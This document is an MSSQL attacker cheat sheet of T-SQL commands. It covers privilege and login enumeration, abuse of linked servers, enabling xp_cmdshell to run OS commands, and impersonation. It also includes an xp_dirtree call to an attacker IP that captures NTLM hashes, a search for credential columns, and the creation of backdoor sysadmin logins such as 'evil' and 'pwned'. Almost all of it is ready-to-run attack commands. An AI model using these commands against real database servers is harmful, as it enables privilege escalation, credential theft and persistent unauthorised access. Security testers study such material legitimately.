MSSQL Attacker Cheat Sheet ========================== 🔍 Context & Privilege ---------------------- SELECT SYSTEM_USER, ORIGINAL_LOGIN(); -- Show current and original login SELECT IS_SRVROLEMEMBER('sysadmin'); -- Are you sysadmin? SELECT DB_NAME(); -- Current DB context SELECT @@SERVERNAME, SERVERPROPERTY('ServerName');-- Current server name 🔐 User & Role Enumeration -------------------------- SELECT name, type_desc, is_disabled FROM sys.sql_logins; -- SQL logins SELECT name FROM sys.server_principals WHERE type_desc = 'SERVER_ROLE'; -- Server roles SELECT name, authentication_type_desc FROM sys.database_principals -- DB-level users WHERE type IN ('S','U','G') AND name NOT LIKE 'db_%'; 🔗 Linked Server Enumeration --------------------------- EXEC sp_linkedservers; -- List linked servers EXEC sp_helplinkedsrvlogin 'LinkedServer'; -- Login mappings SELECT is_rpc_out_enabled FROM sys.servers WHERE name = 'LinkedServer'; -- RPC OUT? 🚨 Check sysadmin access on a Linked Server ------------------------------------------ SELECT * FROM OPENQUERY([LinkedServer], 'SELECT IS_SRVROLEMEMBER(''sysadmin'')'); 💣 Abuse Linked Server with sysadmin Rights ------------------------------------------ -- If RPC OUT is enabled: EXEC ('EXEC xp_cmdshell ''whoami'';') AT [LinkedServer]; EXEC ('CREATE LOGIN pwned WITH PASSWORD = ''P@ss123!''; EXEC sp_addsrvrolemember ''pwned'', ''sysadmin'';') AT [LinkedServer]; -- If RPC is disabled: SELECT * FROM OPENQUERY([LinkedServer], 'SELECT name FROM sys.sql_logins'); 🧰 Enable & Use xp_cmdshell --------------------------- -- Enable: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Use: EXEC xp_cmdshell 'whoami'; -- Check if enabled: SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'; 📦 SMB/NTLM Hash Capture ------------------------ EXEC xp_dirtree '\\<attacker_ip>\\share'; -- Triggers NTLM authentication 🔎 Recon for Creds ------------------ -- List all tables: SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES; -- Search for password/credential fields: SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME LIKE '%pass%' OR COLUMN_NAME LIKE '%user%' OR COLUMN_NAME LIKE '%cred%'; 🎭 Impersonation ---------------- -- Check who you can impersonate: SELECT DISTINCT b.name FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; -- Login as that user EXECUTE AS LOGIN = 'dev'; SELECT SYSTEM_USER; GO -- Are we sysadmin SELECT IS_SRVROLEMEMBER('sysadmin'); GO -- Impersonate: EXECUTE AS LOGIN = 'some_user'; SELECT SYSTEM_USER; REVERT; 🔐 Create a New Sysadmin (Local or Remote) ------------------------------------------ CREATE LOGIN evil WITH PASSWORD = 'B@dPass123!'; EXEC sp_addsrvrolemember 'evil', 'sysadmin';